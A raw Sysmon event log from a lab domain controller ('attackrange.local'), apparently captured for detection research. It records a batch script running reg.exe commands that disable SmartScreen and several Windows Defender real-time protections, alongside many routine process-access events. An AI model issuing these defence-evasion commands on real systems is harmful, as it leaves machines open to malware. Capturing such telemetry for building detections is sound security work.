12:04:38.802{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009236Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.802{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009235Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.802{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009234Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.802{266CAFBE-64C1-6064-9100-00000000AE01}51084328C:\Windows\system32\csrss.exe{266CAFBE-6556-6064-2F01-00000000AE01}6720C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009233Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.802{266CAFBE-6556-6064-2501-00000000AE01}14802428C:\Windows\system32\cmd.exe{266CAFBE-6556-6064-2F01-00000000AE01}6720C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009232Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.812{266CAFBE-6556-6064-2F01-00000000AE01}6720C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t "REG_SZ" /d "Off" /fC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\1.bat" " 13241300x80000000000000009231Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:04:38.802{266CAFBE-6556-6064-2E01-00000000AE01}6560C:\Windows\system32\reg.exeHKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnableDWORD (0x00000001) 10341000x80000000000000009230Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.802{266CAFBE-6556-6064-2601-00000000AE01}12645496C:\Windows\system32\conhost.exe{266CAFBE-6556-6064-2E01-00000000AE01}6560C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009229Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.787{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009228Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.787{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009227Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.787{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009226Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.787{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009225Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.787{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-6556-6064-2E01-00000000AE01}6560C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009224Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.787{266CAFBE-6556-6064-2501-00000000AE01}14802428C:\Windows\system32\cmd.exe{266CAFBE-6556-6064-2E01-00000000AE01}6560C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009223Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.801{266CAFBE-6556-6064-2E01-00000000AE01}6560C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /fC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\1.bat" " 13241300x80000000000000009222Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:04:38.787{266CAFBE-6556-6064-2D01-00000000AE01}6604C:\Windows\system32\reg.exeHKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtectionDWORD (0x00000001) 10341000x80000000000000009221Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.787{266CAFBE-6556-6064-2601-00000000AE01}12645496C:\Windows\system32\conhost.exe{266CAFBE-6556-6064-2D01-00000000AE01}6604C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009220Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.787{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009219Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.787{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009218Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.787{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009217Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.787{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009216Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.787{266CAFBE-64C1-6064-9100-00000000AE01}51086184C:\Windows\system32\csrss.exe{266CAFBE-6556-6064-2D01-00000000AE01}6604C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009215Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.787{266CAFBE-6556-6064-2501-00000000AE01}14802428C:\Windows\system32\cmd.exe{266CAFBE-6556-6064-2D01-00000000AE01}6604C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009214Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.793{266CAFBE-6556-6064-2D01-00000000AE01}6604C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /fC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\1.bat" " 13241300x80000000000000009213Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:04:38.787{266CAFBE-6556-6064-2C01-00000000AE01}6492C:\Windows\system32\reg.exeHKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoringDWORD (0x00000001) 23542300x80000000000000009212Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.787{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3DFE558161E273DC1DDE23559A1F5AE7,SHA256=6B446FD5BE5C6773C4EFC913D4A7ADA6BFDCB87D82B701C507F2C89B55E2256A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000009211Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.771{266CAFBE-6556-6064-2601-00000000AE01}12645496C:\Windows\system32\conhost.exe{266CAFBE-6556-6064-2C01-00000000AE01}6492C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009210Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.771{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009209Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.771{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009208Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.771{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009207Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.771{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009206Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.771{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-6556-6064-2C01-00000000AE01}6492C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009205Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 